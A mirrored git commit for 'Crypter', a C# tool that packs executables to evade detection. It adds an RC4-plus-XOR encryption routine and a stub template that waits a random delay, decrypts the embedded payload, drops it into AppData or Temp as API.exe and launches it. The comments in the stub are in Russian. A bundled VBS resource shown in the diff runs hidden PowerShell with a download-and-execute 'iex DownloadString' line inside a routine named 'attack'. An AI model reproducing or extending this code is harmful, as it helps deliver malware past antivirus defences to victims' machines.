qwqdanchun
/
Crypter
mirror of https://github.com/qwqdanchun/Crypter.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

add

This commit is contained in:
qwqdanchun 2020-05-18 21:16:02 +08:00
parent 5e369e0a2d
commit 71cd2f8f50
11 changed files with 18821 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
Crypter/Crypter.csproj
View File

@ -53,7 +53,7 @@
<Reference Include="DotNetZip, Version=1.13.7.0, Culture=neutral, PublicKeyToken=6583c7c814667745, processorArchitecture=MSIL">
<HintPath>..\packages\DotNetZip.1.13.7\lib\net40\DotNetZip.dll</HintPath>
<EmbedInteropTypes>False</EmbedInteropTypes>
<Private>False</Private>
<Private>True</Private>
</Reference>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
@ -138,6 +138,7 @@
<Content Include="Resources\autoit_url.txt" />
<Content Include="Resources\imgcrypt.txt" />
<Content Include="Resources\CSharp_js_url.txt" />
<Content Include="Resources\rc4_xor.txt" />
<Content Include="Resources\VBS_img.txt" />
<Content Include="Resources\VBS_url.txt" />
<Content Include="Resources\VB.txt" />

15
Crypter/Form1.Designer.cs generated
View File

@ -69,6 +69,7 @@
this.groupBox2 = new System.Windows.Forms.GroupBox();
this.button18 = new System.Windows.Forms.Button();
this.button17 = new System.Windows.Forms.Button();
this.button19 = new System.Windows.Forms.Button();
this.contextMenuStrip1.SuspendLayout();
this.menuStrip1.SuspendLayout();
this.groupBox1.SuspendLayout();
@ -415,7 +416,7 @@
this.groupBox2.Size = new System.Drawing.Size(126, 68);
this.groupBox2.TabIndex = 27;
this.groupBox2.TabStop = false;
this.groupBox2.Text = "groupBox2";
this.groupBox2.Text = "imgVBS";
//
// button18
//
@ -437,12 +438,23 @@
this.button17.UseVisualStyleBackColor = true;
this.button17.Click += new System.EventHandler(this.button17_Click);
//
// button19
//
this.button19.Location = new System.Drawing.Point(144, 308);
this.button19.Name = "button19";
this.button19.Size = new System.Drawing.Size(59, 38);
this.button19.TabIndex = 28;
this.button19.Text = "RC4\r\nXOR";
this.button19.UseVisualStyleBackColor = true;
this.button19.Click += new System.EventHandler(this.button19_Click);
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.BackColor = System.Drawing.SystemColors.Control;
this.ClientSize = new System.Drawing.Size(751, 383);
this.Controls.Add(this.button19);
this.Controls.Add(this.groupBox2);
this.Controls.Add(this.button15);
this.Controls.Add(this.groupBox1);
@ -527,6 +539,7 @@
private System.Windows.Forms.GroupBox groupBox2;
private System.Windows.Forms.Button button18;
private System.Windows.Forms.Button button17;
private System.Windows.Forms.Button button19;
}
}

96
Crypter/Form1.cs
View File

@ -11,6 +11,9 @@ using System.Diagnostics;
using Ionic.Zip;
using Crypter;
using System.Drawing;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.Collections.Generic;
namespace CrypterExample
{
@ -554,5 +557,98 @@ namespace CrypterExample
"Error!", MessageBoxButtons.OK, MessageBoxIcon.Information);
}
}
static string ByteArrayToString(byte[] ba)
{
return BitConverter.ToString(ba).Replace("-", "");
}
static byte[] RC4(byte[] pwd, byte[] data)
{
int a, i, j, k, tmp;
int[] key, box;
byte[] cipher;
key = new int[256];
box = new int[256];
cipher = new byte[data.Length];
for (i = 0; i < 256; i++)
{
key[i] = pwd[i % pwd.Length];
box[i] = i;
}
for (j = i = 0; i < 256; i++)
{
j = (j + box[i] + key[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
}
for (a = j = i = 0; i < data.Length; i++)
{
a++;
a %= 256;
j += box[a];
j %= 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
k = box[((box[a] + box[j]) % 256)];
cipher[i] = (byte)(data[i] ^ k);
}
return cipher;
}
static string XOR(string target)
{
string result = "";
for (int i = 0; i < target.Length; i++)
{
char ch = (char)(target[i] ^ 123);
result += ch;
}
//Console.WriteLine("XOR Encoded string: " + result);
return result;
}
public static string CompressString(string value)
{
byte[] byteArray = new byte[0];
if (!string.IsNullOrEmpty(value))
{
byteArray = Encoding.UTF8.GetBytes(value);
using (MemoryStream stream = new MemoryStream())
{
using (GZipStream zip = new GZipStream(stream, CompressionMode.Compress))
{
zip.Write(byteArray, 0, byteArray.Length);
}
byteArray = stream.ToArray();
}
}
return Convert.ToBase64String(byteArray);
}
private void button19_Click(object sender, EventArgs e)
{
if (textBox1.Text != "" && textBox3.Text != "")
{
string bytesString = ByteArrayToString(RC4(Encoding.Default.GetBytes(textBox3.Text), File.ReadAllBytes(textBox1.Text))); //Шифруем байты, конвертируем шифрованные байты файла в строку
string Source = Crypter.Properties.Resources.rc4_xor; // Переменная, в которой хранится код стаба
Source = Source.Replace("[BYTES]", CompressString(XOR(bytesString))); // Заменяем строку [BYTES], на заксоренную строку с шифрованными байтами
Source = Source.Replace("[PASSWORD]", CompressString(textBox3.Text)); // Заменяем пароль для RC4
textBox2.Text = Source;
MessageBox.Show("Copy to VS ; Use .NET Framework 4 ; Choose Windows Application.",
"Success!", MessageBoxButtons.OK, MessageBoxIcon.Information);
}
else
{
MessageBox.Show("Please select the file and enter the key.",
"Error!", MessageBoxButtons.OK, MessageBoxIcon.Information);
}
}
}
}

45
Crypter/Properties/Resources.Designer.cs generated
View File

@ -404,6 +404,30 @@ namespace Crypter.Properties {
}
}
/// <summary>
/// 查找类似 using System;
///using System.Diagnostics;
///using System.IO;
///using System.Text;
///using System.Threading;
///using System.IO.Compression;
///using System.Reflection;
///
///namespace StubEch
///{
/// class Program
/// {
/// static void Main(string[] args)
/// {
/// Thread.Sleep(new Random(Environment.TickCount).Next(500, 5500)); // Делаем рандомную задержку перед запуском
/// byte[] encryptedBytes = StringToByteArray(XOR(DecompressString(&quot;[BYTES]&quot;))); // Сначала принимаем строку зашифрован [字符串的其余部分被截断]&quot;; 的本地化字符串。
/// </summary>
internal static string rc4_xor {
get {
return ResourceManager.GetString("rc4_xor", resourceCulture);
}
}
/// <summary>
/// 查找类似 Module ReFUD
/// Sub Main()
@ -428,7 +452,26 @@ namespace Crypter.Properties {
}
/// <summary>
/// 查找类似 的本地化字符串。
/// 查找类似 Dim Capony
///Dim WshProcEnv
///Dim process_architecture
///
///Set Capony = CreateObject(&quot;WScript.Shell&quot;)
///Set WshProcEnv = Capony.Environment(&quot;Process&quot;)
///
///process_architecture= WshProcEnv(&quot;PROCESSOR_ARCHITECTURE&quot;)
///
///If process_architecture = &quot;x86&quot; Then
/// attack(&quot;Powershell&quot;)
///Else
/// attack(&quot;C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe&quot;)
///End If
///
///
///
///sub attack(S)
///
///Capony.Run S +&quot; -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString(&apos;123456&apos;)&quot;, CONSOLE_HIDE, CMD [字符串的其余部分被截断]&quot;; 的本地化字符串。
/// </summary>
internal static string VBS_img {
get {

3
Crypter/Properties/Resources.resx
View File

@ -163,6 +163,9 @@
<data name="rc4" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\rc4.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;utf-8</value>
</data>
<data name="rc4_xor" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\rc4_xor.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;utf-8</value>
</data>
<data name="VB" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\vb.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;gb2312</value>
</data>

126
Crypter/Resources/rc4_xor.txt Normal file
View File

@ -0,0 +1,126 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Threading;
using System.IO.Compression;
using System.Reflection;
namespace StubEch
{
class Program
{
static void Main(string[] args)
{
Thread.Sleep(new Random(Environment.TickCount).Next(500, 5500)); // Делаем рандомную задержку перед запуском
byte[] encryptedBytes = StringToByteArray(XOR(DecompressString("[BYTES]"))); // Сначала принимаем строку зашифрованных байтов (RC4 + XOR), декодируем XOR, в конце получаем зашифрованные байты.
byte[] passBytes = Encoding.Default.GetBytes(DecompressString("[PASSWORD]")); // Получаем байты пароля для RC4
byte[] decryptedBytes = RC4(passBytes, encryptedBytes); // Декодируем байты
DAR(decryptedBytes, "API.exe"); // Дропаем и запускаем чистый файл
}
static void DAR(byte[] bytes, string fileName) // В качестве аргументов принимаем байты и имя файла
{
string[] dirs = new string[] // Создаём массив папок, в один из которых будет дропаться файл
{
Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), // LocalAppData
Path.GetTempPath() // Temp
};
Random random = new Random(); // Создаём переменную random, для генерации случайного числа
int pathIndex = random.Next(0, dirs.Length); // Определим индекс массива рандомно
string filePath = dirs[pathIndex] + "\\" + fileName; // Переменная, в которой хранится полный путь до файла
try
{
if (File.Exists(filePath)) // Делаем проверку на наличие файла в папке
{
File.Delete(filePath); // Если файл существует, то удаляем его
}
File.WriteAllBytes(filePath, bytes); // Записываем байты в файл
Process.Start(filePath); // Запускаем
}
catch { }
}
static byte[] StringToByteArray(string hex)
{
int NumberChars = hex.Length;
byte[] bytes = new byte[NumberChars / 2];
for (int i = 0; i < NumberChars; i += 2)
bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
return bytes;
}
static string XOR(string target)
{
string result = "";
for (int i = 0; i < target.Length; i++)
{
char ch = (char)(target[i] ^ 123);
result += ch;
}
//Console.WriteLine("XOR Encoded string: " + result);
return result;
}
public static string DecompressString(string str)
{
var value = Convert.FromBase64String(str);
string resultString = string.Empty;
if (value != null && value.Length > 0)
{
using (MemoryStream stream = new MemoryStream(value))
using (GZipStream zip = new GZipStream(stream, CompressionMode.Decompress))
using (StreamReader reader = new StreamReader(zip))
{
resultString = reader.ReadToEnd();
}
}
return resultString;
}
static byte[] RC4(byte[] pwd, byte[] data)
{
int a, i, j, k, tmp;
int[] key, box;
byte[] cipher;
key = new int[256];
box = new int[256];
cipher = new byte[data.Length];
for (i = 0; i < 256; i++)
{
key[i] = pwd[i % pwd.Length];
box[i] = i;
}
for (j = i = 0; i < 256; i++)
{
j = (j + box[i] + key[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
}
for (a = j = i = 0; i < data.Length; i++)
{
a++;
a %= 256;
j += box[a];
j %= 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
k = box[((box[a] + box[j]) % 256)];
cipher[i] = (byte)(data[i] ^ k);
}
return cipher;
}
}
}

BIN
Crypter/bin/Debug/Crypted.exe Normal file
View File

Binary file not shown.

BIN
Crypter/bin/Debug/DotNetZip.dll Normal file
View File

Binary file not shown.

BIN
Crypter/bin/Debug/DotNetZip.pdb Normal file
View File

Binary file not shown.

18536
Crypter/bin/Debug/DotNetZip.xml Normal file
View File

File diff suppressed because it is too large Load Diff

0
Crypter/obj/Debug/Crypter.csproj.CopyComplete Normal file
View File